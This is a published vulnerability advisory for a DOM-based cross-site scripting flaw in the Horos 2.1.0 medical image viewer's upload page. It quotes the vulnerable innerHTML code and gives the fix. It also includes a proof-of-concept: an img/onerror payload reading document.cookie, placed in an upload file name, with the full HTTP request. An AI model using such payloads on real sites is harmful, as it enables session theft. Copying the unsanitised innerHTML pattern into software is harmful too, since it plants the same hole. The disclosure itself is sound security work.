Horos 2.1.0 Cross Site Scripting

2016-12-16T00:00:00
ID PACKETSTORM:140192
Type packetstorm
Reporter LiquidWorm
Modified 2016-12-16T00:00:00

Description

                                        
                                            `  
Horos 2.1.0 Web Portal DOM Based XSS  
  
  
Vendor: Horos Project  
Product web page: https://www.horosproject.org  
Affected version: 2.1.0  
  
Summary: HorosaC/ is an open-source, free medical image viewer. The goal of the  
Horos Project is to develop a fully functional, 64-bit medical image viewer for  
OS X. Horos is based upon OsiriX and other open source medical imaging libraries.  
  
Desc: Horos suffers from a DOM-based XSS vulnerability because it doesn't use proper sanitization  
when user input goes to a dangerous HTML modification sink ((element).innerHTML). This can be  
exploited to execute arbitrary HTML and script code in a user's browser DOM in context of an  
affected site.  
  
Tested on: macOS 12.10.2 (Sierra)  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2016-5385  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5385.php  
  
  
15.12.2016  
  
--  
  
  
------vuln-----  
  
function fileSelected() {  
var file = document.getElementById('fileToUpload').files[0];  
if (file) {  
var fileSize = 0;  
if (file.size > 1024 * 1024)  
fileSize = (Math.round(file.size * 100 / (1024 * 1024)) / 100).toString() + 'MB';  
else  
fileSize = (Math.round(file.size * 100 / 1024) / 100).toString() + 'KB';  
  
document.getElementById('fileName').innerHTML = 'Name: ' + file.name; // xss  
document.getElementById('fileSize').innerHTML = 'Size: ' + fileSize;  
document.getElementById('fileType').innerHTML = 'Type: ' + file.type;  
}  
}  
  
function uploadFile()  
{  
document.getElementById('progressbar').innerHTML = '0%';  
document.getElementById("progressbar").style.width = '0%';  
document.getElementById("progressbar").className = "progress-bar progress-bar-striped";  
document.getElementById("upload_button").className = "btn btn-default disabled";  
  
setTimeout(function(){  
  
var fd = new FormData();  
fd.append("fileToUpload", document.getElementById('fileToUpload').files[0]);  
var xhr = new XMLHttpRequest();  
xhr.upload.addEventListener("progress", uploadProgress, false);  
xhr.addEventListener("load", uploadComplete, false);  
xhr.addEventListener("error", uploadFailed, false);  
xhr.addEventListener("abort", uploadCanceled, false);  
xhr.open("POST", "", true);  
xhr.send(fd);  
  
}, 500);  
}  
  
...  
  
<form class="col-md-12" id="form1" action="javascript:void(0);" method="post" enctype="multipart/form-data">  
<div class="form-group col-md-12">  
<label for="fileToUpload">File input</label>  
<input type="file" name="file" id="fileToUpload" onchange="fileSelected();">  
<div class="help-block">  
<div id="fileName"></div> // xss  
<div id="fileSize"></div>  
<div id="fileType"></div>  
</div>  
</div>  
<div class="col-lg-2 col-md-3">  
<button type="submit" class="btn btn-default" id="upload_button" name="upload_button" onclick="uploadFile()" value="Upload">Upload</button>  
</div>  
<div class="col-lg-10 col-md-9 help-block">  
<div class="progress" id="progressbar_containter" style="display: none;">  
<div class="progress-bar progress-bar-striped" id="progressbar" role="progressbar" aria-valuenow="2" aria-valuemin="0" aria-valuemax="100" style="min-width: 2em;"></div>  
</div>  
</div>  
</form>  
  
  
------/vuln-----  
  
Element output: <div id="fileName">Name: <img src="#" onerror="alert(document.cookie)" :="">.mp3</div>  
Fix: (element).innerText or (element).textContent  
  
PoC payload: <img src="#" onerror="alert(document.cookie")/>:  
  
  
POST /main HTTP/1.1  
Host: 127.0.0.1:3333  
Content-Length: 3  
Origin: http://127.0.0.1:3333  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBUg5yXYbUF1w5AEi  
Accept: */*  
Referer: http://127.0.0.1:3333/main  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.8  
Cookie: OSID=53B11D55703E7A7DA14AF867B2C7E346  
DNT: 1  
Connection: close  
  
------WebKitFormBoundaryBUg5yXYbUF1w5AEi  
Content-Disposition: form-data; name="fileToUpload"; filename="<img src=%22#%22 onerror=%22alert(document.cookie)%22:>.mp3"  
Content-Type: audio/mp3  
  
ZSL  
------WebKitFormBoundaryBUg5yXYbUF1w5AEi--  
  
`